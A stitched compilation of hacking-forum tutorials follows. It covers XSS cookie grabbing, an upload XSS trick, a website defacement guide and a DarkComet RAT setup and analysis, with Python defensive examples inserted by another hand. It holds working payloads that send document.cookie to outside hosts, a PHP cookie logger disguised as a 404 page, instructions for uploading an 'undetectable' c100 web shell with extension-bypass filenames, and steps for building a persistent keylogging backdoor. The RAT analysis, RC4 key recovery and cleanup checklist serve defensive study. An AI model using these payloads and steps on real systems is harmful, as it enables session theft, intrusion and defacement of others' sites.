http://site.example/index.php?sessionid=12345678&username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 %63%72%69%70%74%3E

Cookie Grabbing:
The cookie grabbing technique: what is it and how is it applied?
This technique applies to sites vulnerable to cross site scripting. This vulnerability allows the execution of arbitrary JavaScript code on the web application, and therefore also the execution of malicious scripts that grab (take) cookies from the site itself.

An example of malicious JavaScript code could be:

Code:
<script language="JavaScript"> window.location="http://www.sitomio.net/logs.php?cooked="+document.cookie </script>
The URL would be:

Code:
http://www.vulnerablesite.net?Keywords=%3Cscript+language%3D%22JavaScript%22%3E+window.location%3D%22http%3A%2F%2Fwww.mysite.net%2Flogs.php%3Fcooked%3D%22%2Bdocument.cookie+%3C%2Fscript%3E

What happens? http://www.vulnerablesite.net is the site vulnerable to XSS, Keywords is the vulnerable parameter, and http://www.mysite.net is where the vulnerable site is redirected to grab the cookies, specifically to the logs.php file that we create:

Code:
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<?php
$capo = "\n"; // newline written after each entry
$data = $_GET['data']; // take what follows "data" in the URL and put it in the variable "data"
$fh = fopen("cookies.txt", 'a+'); // open cookies.txt for appending (created if it does not exist)
fwrite($fh, "$data"); // write the variable "data" to cookies.txt
fwrite($fh, "$capo"); // newline
fclose($fh); // close the file
?>
<p>The requested URL was not found on this server.</p>
</body>
</html>
As you can see, everything is hidden: the page will simply display "The requested URL was not found on this server", faking a 404 Not Found, while all the victims' cookies are saved in cookies.txt.
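The defender's side of the reflected, stored and cookie grabbing cases above, as an added example that is not part of the original post (Python rather than the tutorial's PHP; function and parameter names are my own). render_welcome_unsafe reproduces the concatenation the tutorial exploits; render_welcome and render_comment escape the untrusted value, and the session cookie is issued with HttpOnly so document.cookie no longer exposes it.

```python
import html
from urllib.parse import urlparse, parse_qs

# The non-persistent example's URL from above, as the vulnerable page receives it
# (constructed copy; attackerhost.example is the tutorial's own placeholder host).
TUTORIAL_URL = ("http://site.example/index.php?sessionid=12345678&username="
                "%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattackerhost.example"
                "%2Fcgi-bin%2Fcookiesteal.cgi%3F%27%2Bdocument.cookie%3C%2Fscript%3E")


def username_from_url(url: str) -> str:
    """Decode the username parameter the way the vulnerable page would see it."""
    qs = parse_qs(urlparse(url).query)
    return qs.get("username", [""])[0]


def render_welcome_unsafe(username: str) -> str:
    """The tutorial's bug: untrusted input concatenated straight into HTML."""
    return "<p>Welcome back, " + username + "!</p>"


def render_welcome(username: str) -> str:
    """Hardened: HTML-escape before the value reaches an HTML text context.
    quote=True also escapes ' and " so the value is safe inside attributes."""
    return "<p>Welcome back, " + html.escape(username, quote=True) + "!</p>"


def render_comment(author: str, body: str) -> str:
    """Stored (persistent) case: the same rule applies to data read back from storage."""
    return ('<div class="comment"><b>' + html.escape(author, quote=True) + "</b>: "
            + html.escape(body, quote=True) + "</div>")


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie with HttpOnly: script cannot read the cookie, so document.cookie
    exfiltration of the session id fails even if an XSS slips through. Secure and
    SameSite limit plaintext and cross-site sending respectively."""
    if not session_id.isalnum():
        raise ValueError("session id must be an opaque alphanumeric token")
    return f"Set-Cookie: sessionid={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def is_inert(rendered: str) -> bool:
    """Demo check: no raw script opener or javascript: URL survived rendering."""
    lowered = rendered.lower()
    return "<script" not in lowered and "javascript:" not in lowered


if __name__ == "__main__":
    payload = username_from_url(TUTORIAL_URL)
    print("decoded payload:", payload)
    print("unsafe :", render_welcome_unsafe(payload))
    print("escaped:", render_welcome(payload))
    print(session_cookie_header("12345678"))
```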

Upload XSS:
Here's another neat trick to exploit XSS :D

Open a .gif picture with our beloved Notepad, delete everything inside and replace it with, for example:

Code:
GIF89a<script>alert("XSS")</script>

Close, save and upload the file, and your alert will appear!

Here's what to put before the script to make sure the image is still recognised under its extension:

-PNG = ‰PNG
-GIF = GIF89a
-JPG = ÿØÿà JFIF
-BMP = BMFÖ

As you can see we used GIF89a before the string so that the file still passes as a .gif.

How to Deface Website

Here I will show you how to deface a website.

First of all you will need a shell. I will give you the modified c100 shell which I use and which is undetectable.

Download Link: Shell here

First, when you download c100.php you will need to edit it with Notepad and set your username and password, so that only someone who knows the user/password can access the shell and the website.

[Image: shelasd.jpg]

The green part, username and password, edit as you like. But the md5 pass must be hashed. For that go to
Crypo.com - here you will make the MD5 of your password
[Image: md5pw.jpg]

So on crypo.com you write the password you wrote in c100.php, in my case hakforums, and for that I get this MD5 hash; copy it and paste it into our shell c100.php
Code:
20e1f7d5481da19bf736569eb047e20c

So in my case c100 should look like this

Code:
$login = "Hacking-tool"; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = "hakforums"; //password
$md5_pass = "b54f268a2badf26e2499631f37d7b12e"; //md5-cryped pass. if null, md5($pass)

When you have done that, save it and now find a place on the website where you can upload a file. Sometimes the website will block the .php extension, so you will have to bypass it. First open your shell with Notepad, then Save As and change the extension to one of these:
Code:
shell.php;.jpg
c100.php.jpg
c100.php..jpg
c100.php.jpg:;
c100.php.jpg%;
c100.php.jpg;
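The server-side checks that defeat both the magic-bytes file from the Upload XSS section and the double or junk extensions listed here, as an added example that is mine and not from the tutorial. safe_upload_name allows exactly one allowlisted extension and rejects the ";", "%", ":" and double-dot variants; is_structurally_valid_gif walks the GIF block structure, so a file that merely starts with GIF89a is refused. The tiny valid GIF is constructed inline; function names are my own.

```python
import re
import struct
from typing import Optional, Tuple

# One dot, one allowlisted extension, nothing but [a-z0-9_-] in the base name:
# c100.php.jpg, shell.php;.jpg, c100.php.jpg:; and c100.php..jpg all fail to match.
_NAME_RE = re.compile(r"^[a-z0-9_-]{1,40}\.(gif|png|jpg)$")


def safe_upload_name(filename: str) -> Optional[str]:
    """Canonical lower-case name, or None when the name is not acceptable."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base if _NAME_RE.fullmatch(base) else None


def _skip_sub_blocks(data: bytes, pos: int) -> Optional[int]:
    """Advance past a chain of length-prefixed GIF sub-blocks; None if truncated."""
    while pos < len(data):
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n
    return None


def is_structurally_valid_gif(data: bytes) -> bool:
    """Parse header, logical screen descriptor, colour tables, extensions and image
    blocks. Requires at least one image and the 0x3B trailer as the final byte, so
    both 'GIF89a<script>...' and 'valid gif + appended script' are rejected."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    width, height, packed = struct.unpack("<HHB", data[6:11])
    if width == 0 or height == 0:
        return False
    pos = 13
    if packed & 0x80:  # global colour table present
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    saw_image = False
    while pos is not None and pos < len(data):
        introducer = data[pos]
        pos += 1
        if introducer == 0x3B:  # trailer must close the file
            return saw_image and pos == len(data)
        if introducer == 0x21:  # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif introducer == 0x2C:  # image descriptor: 9 bytes, optional LCT, LZW size, data
            if pos + 9 > len(data):
                return False
            ipacked = data[pos + 8]
            pos += 9
            if ipacked & 0x80:
                pos += 3 * (2 ** ((ipacked & 0x07) + 1))
            pos = _skip_sub_blocks(data, pos + 1)
            saw_image = True
        else:
            return False
    return False


def validate_upload(filename: str, data: bytes) -> Tuple[Optional[str], str]:
    """Name check plus structural check for GIFs (PNG/JPG need their own parser).
    Serve the stored file under the returned name with its own Content-Type and
    X-Content-Type-Options: nosniff, never under the user-supplied name."""
    name = safe_upload_name(filename)
    if name is None:
        return None, "extension or name rejected"
    if name.endswith(".gif") and not is_structurally_valid_gif(data):
        return None, "not a well-formed GIF"
    return name, "ok"


# Constructed 1x1 GIF: header, screen descriptor, image descriptor, LZW data, trailer.
MINIMAL_GIF = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0)
               + b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
               + b"\x02" + b"\x02\x44\x01" + b"\x00" + b"\x3B")

if __name__ == "__main__":
    print(validate_upload("avatar.gif", MINIMAL_GIF))
    print(validate_upload("avatar.gif", b"GIF89a<script>alert('XSS')</script>"))
    print(validate_upload("c100.php.jpg", MINIMAL_GIF))
```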


If the website doesn't have anywhere to upload files but has a place where you can add news, a new event or similar, you can use meta http-equiv to redirect from the website to your deface page. You do that by adding this code in the news:
Code:
<meta http-equiv="refresh" content="0;url=http://link_to_your_defacee_page">

Once you find the admin panel upload your shell; if you can't upload .php directly, upload it with the modified extensions stated above.

[Image: neasd.jpg]

After you upload it, find the link where it was stored; for example, if you uploaded it into images it will be at site/images/c100.php. After you open the link a new pop-up window will appear asking you to log in. Here you write the username and password you set in c100.php. After that you should be in the website.


Sometimes simple extension hiding will not work, so you will have to use the Firefox add-on Live HTTP Headers. Install it, hide the shell extension and go to the upload section. Open Live HTTP Headers and upload the shell. Now if you try to go to the link where your shell was uploaded it will give an error (only on some websites), so we will have to change that hidden .php.jpg extension back to .php. Having uploaded the shell with Live HTTP Headers open, find the request that uploaded the shell. Select it and then click the Replay button.


[Image: 124124g.jpg]

After that you will have to find once again the same line which shows that you uploaded the shell. When you find it, select the extension you used to hide the original .php; in my case it is .jpg (the list of these extensions is given earlier in this tutorial). Delete it so that only c100.php remains, and once again click Replay.

[Image: 12412412414.png]

It should take you to the shell screen; if it doesn't, you will have to find manually where the shell was uploaded and go to that link. Note: this doesn't work for every website, but it works for a lot. Now you are in the website.

[Image: unlednzl.jpg]

Find the main index.php, edit it with your deface page source code, and click save. That's it.

Happy defacing

DarkComet

DarkComet RAT used in the Syrian conflict?

On February 17th CNN published an interesting article in which some opponents of the Syrian regime claimed that the government was using a Trojan to monitor and disrupt the protesters' network. Apparently the regime has been using a well-known social engineering technique: impersonate a trusted person, then attack from the inside. It is not possible to confirm the story, but this is what the opponents of the regime report: apparently one of the protesters was taken to jail and promptly forced to hand over his passwords. Those passwords were later used to access his Skype account and infiltrate the network of protesters, spreading via chat a program containing malicious code. In other cases the same file was delivered as a Facebook Chat security update, together with a Facebook icon, while other people claim it was also sent by mail. Whatever the means, the common sign among all the stories is that this file, after being opened, simply did nothing, and even the antivirus didn't complain at all.

Preliminary Analysis

We don't have many elements for the analysis, but we can speculate a bit. First of all, the malware wasn't delivered through an exploit but as a plain executable file, so apparently we are not dealing with a high-profile attack. Then, in one case the malware file wasn't even embedded in another application, reinforcing the hypothesis that the attack might have been set up in a quick and dirty way. It wouldn't be too unrealistic to assume that the malware wasn't even coded by the government but acquired from the "black market", or even worse from the internet as a commercial or free tool. Fortunately TrendMicro was able to gather two different samples delivered to the opponents of the regime, and found that both were different versions of the popular DarkComet RAT. The first was a DarkComet v5 plain executable; the second was DarkComet v3.3 embedded in a decoy MAC Changer application. This might also indicate that the government started monitoring the protesters from the very beginning of the uprising; in fact DarkComet v3.3 was released at the end of April 2011, just a month after the demonstrations began. Did the government really choose DarkComet to fight the opposition? Apparently so, and for us it's a good opportunity to dissect this program to gain deeper knowledge, and possibly to be able to detect and remove it.

DarkComet v5

First of all we need to download DarkComet from its website: , it comes as a package and no installation is required: simply unpack it somewhere and run DarkCometRAT.exe. Clearly we'll have to split the configuration in two parts, the client and the server; optionally we can also configure the downloader module, the main vector used to grab the custom executable from the web, and apparently the same module that's been used in the Syrian attacks, so it may be worth taking a look at it. It might also be a good idea to run all the components inside a Virtual Machine... You know, just in case...

Configuring the Server Module

After opening the client just click on the main menu and open the Server module section:
This is where we'll set up the backdoor; we are going to use a plausible configuration. So first of all set your password: it will be used to encrypt all the traffic, and this is really important. Generate the names used by the backdoor for the mutex and server id, then, just to make our reverse engineering session more interesting, activate the FWB. Choose the network IP address where you want the data to be sent by the infected target, the port (885 in our case), and then configure the Module Startup parameters:
You're allowed to choose among several predefined locations: documents directory, favorites folder, desktop, windows directory, cookie path etc... In this case the path and final filename are not important; we're not doing forensics and we know exactly what to look for, so for your own convenience use something easy to remember. Just don't forget to check the Persistence Installation option. Decide whether or not you want to show a message upon the backdoor's startup (I decided not to) and jump to the Module Shield section:
We want to make the backdoor as widely usable as possible, so we'll enable just the first three options. In a real configuration I wouldn't mess with the firewall, UAC and AV notifications; that would probably be too "noisy", and any user with a little knowledge of what he's doing would understand that something is wrong. After setting up everything we like, we can jump to the keylogger configuration:
The FTP server is optional and only required if you want to transfer keylog data via FTP. If you like, set up your FTP (just use FileZilla Server if you don't have one already running) and fill in the credentials; my password is the same used to encrypt the traffic: quepassword. Decide if you want to change the icon or mess with the victim's hosts file and go to the Build Module section. We're not using the file binder because it wasn't used in the original attack; anyway, should you be curious, what you have to know is that it's a simple packager that starts one file and drops the other in the %tmp% directory, running it at the same time. That's what you would use to bind the backdoor with another legitimate file.
Choose whether you want your final executable packed or not, and finally build the server!

Configuring the Downloader

This is the easy part: simply go back to DarkCometRAT and choose Edit Server Downloader; you'll just have to set up the web server address where your backdoor is stored:

Configuring the Client

Open the Client Settings option and don't forget to set your password if you want your target to connect back to you:
Any other option is up to you and most probably not needed for your analysis. Get back to DarkCometRAT and set up a socket and a port where you want to listen for connections; don't forget to forward this port to your computer if you're behind a NAT, or to enable UPnP:
I've used port 885, the same used in the attack reported by the Syrian protesters. It really doesn't matter which one you choose; just be sure to set up the same port on both the server and the client side. Finally we are ready to proceed with the fun part.

Detection Rate

These are the detection rates reported by VirusTotal for the downloader and the backdoor:
SHA1: 3ac42898ae92e106b8002929d50eb51b6a3dbec7
File size: 3.0 KB ( 3072 bytes )
File name: downloader.exe
File type: Win32 EXE
Detection ratio: 28 / 43
SHA1: 42d85163e18f35fd435b5f96a0bce10b8336b440
File size: 745.0 KB ( 762880 bytes )
File name: server.exe
File type: Win32 EXE
Detection ratio: 34 / 43
The downloader is detected mostly as a Generic.Downloader, which is basically what it is. The server is detected as Finlosky or W32.SpyBot by most antiviruses; sometimes I really wonder about the names given by the various companies. Surprisingly enough TrendMicro, the first to analyze the malware used in Syria, didn't detect either of them at the time of writing. Probably even more surprising is the fact that a public tool doesn't get a 43/43 detection rate.

Downloader Analysis

Fire up your preferred disassembler and let it crunch our tiny downloader; as you will see, the code is really simple:
It just loads the binary-patched URL from the resources, downloads the executable file and runs it, simple enough. Just by owning this file we can retrieve the original malware, as you can see from this hex dump:
Filename and URL are not scrambled or encrypted in any way.

Server Analysis

Retrieve the malicious file from the URL pointed to by the downloader and take a clean snapshot of your Virtual Machine, Windows 7 32-bit in my case.
Before running the file we may want to take a snapshot of the registry and of our Documents and tmp directories in order to understand which files and registry entries are created or dropped. For this purpose we can use the handy RegShot application (http://sourceforge.net/projects/regshot/):
Take the first shot before running the file and the second one after running it. From this comparison we'll understand that a couple of changes have been made to our system. First, new files have been created:
C:\Users\Quequero\Documents\MSDCSC\darkcomet.exe
C:\Users\Quequero\AppData\Local\Temp\dclogs\2012-03-09-6.dc
Then a new registry entry has been added:

The original file hides itself after being run. This is not stealthy behavior: normally the files you run don't disappear, so unless your backdoor is started by another file from a temporary directory, auto-removal is not the brightest idea. We can also monitor the process using SysAnalyzer in order to find out which processes are created; from this analysis we see that the backdoor uses several system executables:

The Internet Explorer process is most probably created in order to bypass the firewall, so we can strongly suspect that the backdoor's code is injected into that process. Let's now run GMER, a popular rootkit detector, on our system. GMER is pretty advanced and implements a variety of techniques able to spot many common rootkits; let's see what happens:
Indeed nothing is detected by GMER. This either means that DarkComet is not using any rootkit technique or that it's so advanced it even fools GMER. At least by using GMER's file manager we see that the original file is still on the desktop, but hidden from view:
C:\Users\Quequero\Desktop>attrib server.exe
A SH I C:\Users\Quequero\Desktop\server.exe
Should you be curious, RootkitUnhooker and even Volatility do not detect anything suspicious here... DarkComet's coder wins hands down on this.
So far we have just a few clues that DarkComet is running on our system; let's perform some checks on our network traffic. For this purpose we run Wireshark:

As you can see DarkComet traffic is pretty noticeable; let's try to follow the stream:
Apparently it's just a bunch of data; most probably the traffic is encrypted, so wear your Samurai belt and turn on your preferred debugger: we have an algorithm and a key to find!

Diving into the Debugger

We need to attach to the backdoor, but you'll soon find out that the FWB option prevents the backdoor from working correctly if a debugger is active. We are not going to disable the option, because we are pretending to analyze real malware; instead we'll kill the backdoor and run it from the debugger. Just above we have seen that DarkComet probably runs from inside the Internet Explorer process, so simply kill it; the backdoor (to my surprise) won't respawn. Then point your debugger to the installation path and run it. For this task I've used OllyDbg v2.0-alpha4 (www.ollydbg.de) and the backdoor file installed in my Documents directory. Start your process and step a few instructions after the entry point, until you get here:
DarkComet loads the password from the binary and uses it for the encryption engine. Trying to find the password in the executable will get you nowhere, for the simple reason that the original password is encrypted. That's definitely a good idea, and we'll delve into the encryption scheme in a moment; for now we can step a bit further until we retrieve some more information, like the C&C server address:
In this case it's 192.168.150.129 on port 885; we can also recover the full installation path:
And in the very same way also the FTP address, port, password, user and everything else we've set up during the building phase. All of these options are stored as encrypted strings in the final binary, as an attempt to avoid disclosing "sensitive" data and to protect the user. This is a smart move, of course, and we want to better understand the encryption algorithm and the original key used. In this way we'll be able to decrypt the network traffic of an infected machine and even take control of an already infected target, in order to remove the malware from it.
Restart the malware from the debugger and start tracing the first call that loads the "PWD" resource from the file:
Keep following it and you’ll eventually arrive here:
Check the registers window:
You'll find two interesting strings; take note of their values and proceed a bit further into the same function until you get here:
This loop is particularly interesting for several reasons: first of all there's a big buffer that is continuously rearranged, and then an XOR that uses the values extracted from the buffer. We are definitely dealing with some kind of encryption algorithm, but which one? I had to go back to pen & paper & IDA to find out, and even though I'm pretty quick to recognize an encryption algorithm from the disassembly, this one took me some minutes. So, what is it? The good old RC4! Only with a few optimizations introduced by the compiler that add entropy to the pool, making it just a bit harder to recognize at first sight. To avoid any doubt just reconstruct it from the disassembler (IDA in this case):
There you go, it's RC4 for sure, and this is the first step of the permutation initialization. Then we have the algorithm:
RC4 is an algorithm loved by almost everyone. It's a stream cipher, so you won't have to deal with padding; it's easy to understand, short and fast. The downside is that it's tremendously easy to use in the wrong way, but this is another story. Apparently the algorithm is initialized with a fixed key "#KCMDDC5#-890" and this key is used to decrypt a string: "2955B175B3D8DFAFF28DFF". To check whether I was right, I wrote a helper application that implements RC4, and this was the result:
./rc4 -k "#KCMDDC5#-890" -d 2955B175B3D8DFAFF28DFF
output: quepassword
Oh look! This is the password we set up during the configuration step! So, to avoid storing the password in clear text, it's been encrypted with a default key hardcoded into the binary. The same key is also used to decrypt all the other settings; later on you'll find other strings:
./rc4 -k "#KCMDDC5#-890" -d 1C638B4887FFE980B0AEEE23
output: DC_MUTEX-Que
But if you try to use the same key to decrypt the network traffic, you'll just end up with a bunch of garbage. To understand why, you'll have to hook into one of the threads used to communicate with the C&C server:
Following the function that encrypts the traffic, you'll find out that the algorithm used is the same (once again: RC4) but the key is created by concatenating the hardcoded password with the one we chose at setup time, in our case:
    #KCMDDC5#-890quepassword
If you choose not to use a password, the traffic will still be encrypted:
This time with the hardcoded "#KCMDDC5#-890" alone. Decrypting part of the above dump with the right key will lead you to the clear-text commands:
    SERVER
GetSIN192.168.150.137|243968
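An added example, mine rather than the author's rc4 helper: RC4 in Python with the static key recovered above, so an analyst can decode the hex config strings pulled from a sample and derive the traffic key (static key + operator password) the write-up describes. Only the key and the two hex strings come from the write-up (the author reports them decrypting to quepassword and DC_MUTEX-Que); the GetSIN line used for the traffic demo is constructed in the style of the dump above.

```python
import binascii
from typing import Dict

# Static key recovered in the write-up; every config string in the binary is RC4 under it.
DARKCOMET_STATIC_KEY = b"#KCMDDC5#-890"

# Hex strings quoted in the write-up (resource names are my labels).
CONFIG_STRINGS = {"PWD": "2955B175B3D8DFAFF28DFF", "MUTEX": "1C638B4887FFE980B0AEEE23"}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling (KSA) then keystream generation (PRGA).
    Encryption and decryption are the same XOR, so one function serves both."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_config_string(hex_blob: str, static_key: bytes = DARKCOMET_STATIC_KEY) -> bytes:
    """Config strings sit in the binary as hex text of RC4 ciphertext under the static key."""
    return rc4(static_key, binascii.unhexlify(hex_blob))


def dump_config(strings: Dict[str, str], static_key: bytes = DARKCOMET_STATIC_KEY) -> Dict[str, str]:
    """Decode every config string; latin-1 keeps odd bytes visible instead of raising."""
    return {name: decrypt_config_string(h, static_key).decode("latin-1")
            for name, h in strings.items()}


def traffic_key(user_password: bytes, static_key: bytes = DARKCOMET_STATIC_KEY) -> bytes:
    """The C&C session key is the static key followed by the operator's password
    (just the static key when no password was configured)."""
    return static_key + user_password


def decrypt_traffic(blob: bytes, user_password: bytes) -> bytes:
    return rc4(traffic_key(user_password), blob)


if __name__ == "__main__":
    cfg = dump_config(CONFIG_STRINGS)
    print("config:", cfg)
    # Constructed C&C line in the style of the dump above, encrypted with the traffic key...
    sample = b"GetSIN192.168.150.137|243968"
    wire = rc4(traffic_key(cfg["PWD"].encode("latin-1")), sample)
    # ...the static key alone yields garbage, the concatenated key yields the command.
    print("static key only:", rc4(DARKCOMET_STATIC_KEY, wire))
    print("traffic key    :", decrypt_traffic(wire, cfg["PWD"].encode("latin-1")))
```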

Keylogger

An interesting function is of course the keylogger. As we have seen above, a file is created in the user's temporary directory:
C:\Users\Quequero\AppData\Local\Temp\dclogs\2012-03-09-6.dc
Opening it will reveal the keylogger's data:
It's not clear why this file has been left visible and in clear text; anyway, the data is appended here and sent via FTP, if enabled, when the logfile reaches a given size in kilobytes (the FTP_SIZE variable in the executable):
EDX points to the size, shown in the above picture, with the ASCII value 0x31 which means "1" KB. But how is keylogging performed? Since no driver has been loaded by the backdoor we have to assume that it does something in userspace, and indeed this is the case: the keylogging thread simply calls SetWindowsHook to receive the keyboard notifications:
What I marked as hookProc takes care of keyboard data processing; there's a big switch that identifies every single keystroke, including special keys:
Every keystroke is processed accordingly and then logged into the directory shown above:

Injection

To bypass a firewall that might be in use on the victim's system, DarkComet uses a simple but effective trick: it injects the communication code into a process that's allowed through the firewall, in this case Internet Explorer, thus confirming our suspicions. The injection takes place this way: first Internet Explorer is identified, opened in the background and suspended; then some "extra" memory is allocated in the process and DarkComet's code is copied into this new buffer; after that the process is resumed. The routine that takes care of the injection is, in part, the following:
A confirmation that Internet Explorer is used to send the traffic can be obtained simply by inspecting the "hidden" process with Process Explorer:
In the same way we can identify the backdoor's mutex:
During the analysis in the disassembler you won't be able to find references to the whole API used by the binary; this is because many of the functions are resolved directly with GetProcAddress and then stored in pointers available to the backdoor:
To find where they are resolved, simply look at all the X-refs to GetProcAddress and follow them one by one; to give you an idea, this is what you're going to find:
It won't take long to give a name to every pointer, and it will be of great help should you decide to proceed by yourself with the analysis of the binary.

Detection & Clean up

Detecting DarkComet, in some situations, can be non-trivial. We have examined just one possible case; the backdoor can be stored anywhere, with any name, packed with any packer. The best solution would be to use the DarkComet Removal Tool from the RAT's home page; anyway, if you don't totally trust the author on that, there are still some clues you can catch:
  • Monitor the traffic: KEEPALIVE messages are always sent in clear and the traffic patterns are fairly constant over time
  • Check for FTP data: the keylogger can be configured to deliver keystrokes this way, in clear
  • Check for hidden instances of iexplore.exe; use Process Explorer to see if it's generating traffic
  • Check for unknown values in HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
  • Check for unknown entries in the "Userinit" value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\; this is another path used by the backdoor to run at startup
  • Check for an empty link in the Programs\Startup section of the Start menu
  • Check for the existence of the %tmp%\dclogs\ directory; that's where you'll find the keylogger's data
Detecting the keylogger might not be that easy: you'll have to walk down the hook chain to find it. This is fun but out of the scope of this article; maybe we'll analyze some keylogging detection techniques in a future article.
Once you have identified the threat, remove the registry entries, kill the hidden iexplore.exe, remove the logs directory, remove the executable (you can retrieve the installation path directly from the registry) and reboot. Don't forget that with the knowledge acquired so far you'll also be able to extract the password from any DarkComet sample. This way you'll be able to dump the configuration and understand exactly what the Trojan is doing on a given system and where it is sending the data.
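The checklist above turned into a triage function, as an added example (mine, not the article's): it runs here over a constructed host snapshot rather than a live Windows box, so it executes anywhere. The registry locations, the dclogs path and the KEEPALIVE clue are the ones the article lists; the Run value names, pid, link name and baseline entries are made up for the demo. On a real host the same fields would be filled from reg query, the Startup folder, %TEMP% and a packet capture.

```python
from typing import Dict, List, Tuple

CANONICAL_USERINIT = r"c:\windows\system32\userinit.exe"


def check_userinit(value: str) -> List[str]:
    """Winlogon\\Userinit is a comma-separated list; anything beyond the stock
    userinit.exe entry is a persistence candidate."""
    findings = []
    for entry in value.split(","):
        entry = entry.strip().strip('"').lower()
        if entry and entry != CANONICAL_USERINIT:
            findings.append(f"Userinit extra entry: {entry}")
    return findings


def check_run_keys(run_values: Dict[str, str], baseline: Dict[str, str]) -> List[str]:
    """Flag Run values whose name or command differs from a known-good baseline,
    so a hijacked known name is caught as well as a brand-new one."""
    return [f"Run value not in baseline: {name} = {cmd}"
            for name, cmd in run_values.items()
            if baseline.get(name, "").lower() != cmd.lower()]


def check_startup_folder(links: List[Dict[str, str]]) -> List[str]:
    """A .lnk in Programs\\Startup with an empty target is the 'empty link' clue."""
    return [f"startup link with empty target: {lnk['name']}" for lnk in links if not lnk.get("target")]


def check_tmp_dir(listing: List[str]) -> List[str]:
    """%tmp%\\dclogs\\*.dc is the keylogger's output."""
    return [f"keylog file: {p}" for p in listing
            if "\\dclogs\\" in p.lower() and p.lower().endswith(".dc")]


def check_processes(procs: List[Dict]) -> List[str]:
    """iexplore.exe with no visible window but a live remote connection is the injection host."""
    return [f"hidden iexplore.exe pid {p['pid']} talking to {p['remote']}" for p in procs
            if p["name"].lower() == "iexplore.exe" and not p["visible_window"] and p.get("remote")]


def check_streams(streams: List[Tuple[str, bytes]]) -> List[str]:
    """KEEPALIVE beacons go out in clear even though the session body is RC4."""
    return [f"clear-text KEEPALIVE to {dst}" for dst, data in streams if b"KEEPALIVE" in data]


def triage(snapshot: dict, run_baseline: Dict[str, str]) -> List[str]:
    """Apply every check from the list above and collect the findings."""
    findings: List[str] = []
    findings += check_userinit(snapshot["userinit"])
    findings += check_run_keys(snapshot["run"], run_baseline)
    findings += check_startup_folder(snapshot["startup"])
    findings += check_tmp_dir(snapshot["tmp_listing"])
    findings += check_processes(snapshot["processes"])
    findings += check_streams(snapshot["streams"])
    return findings


# Constructed snapshot: file paths and the C&C endpoint mirror the article's lab run;
# value names, pid, link name and the baseline entry are invented for the demo.
SAMPLE_SNAPSHOT = {
    "userinit": r"C:\Windows\system32\userinit.exe,C:\Users\Quequero\Documents\MSDCSC\darkcomet.exe",
    "run": {"UpdateSvc": r"C:\Users\Quequero\Documents\MSDCSC\darkcomet.exe",
            "SysTray": r"C:\Windows\system32\igfxtray.exe"},
    "startup": [{"name": "update.lnk", "target": ""}],
    "tmp_listing": [r"C:\Users\Quequero\AppData\Local\Temp\dclogs\2012-03-09-6.dc",
                    r"C:\Users\Quequero\AppData\Local\Temp\tmp1234.tmp"],
    "processes": [{"pid": 2044, "name": "iexplore.exe", "visible_window": False,
                   "remote": "192.168.150.129:885"}],
    "streams": [("192.168.150.129:885", b"KEEPALIVE1234"), ("192.168.150.129:885", b"\x8f\x02\x1a")],
}
RUN_BASELINE = {"SysTray": r"C:\Windows\system32\igfxtray.exe"}

if __name__ == "__main__":
    for line in triage(SAMPLE_SNAPSHOT, RUN_BASELINE):
        print("[!]", line)
```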


Click:Download
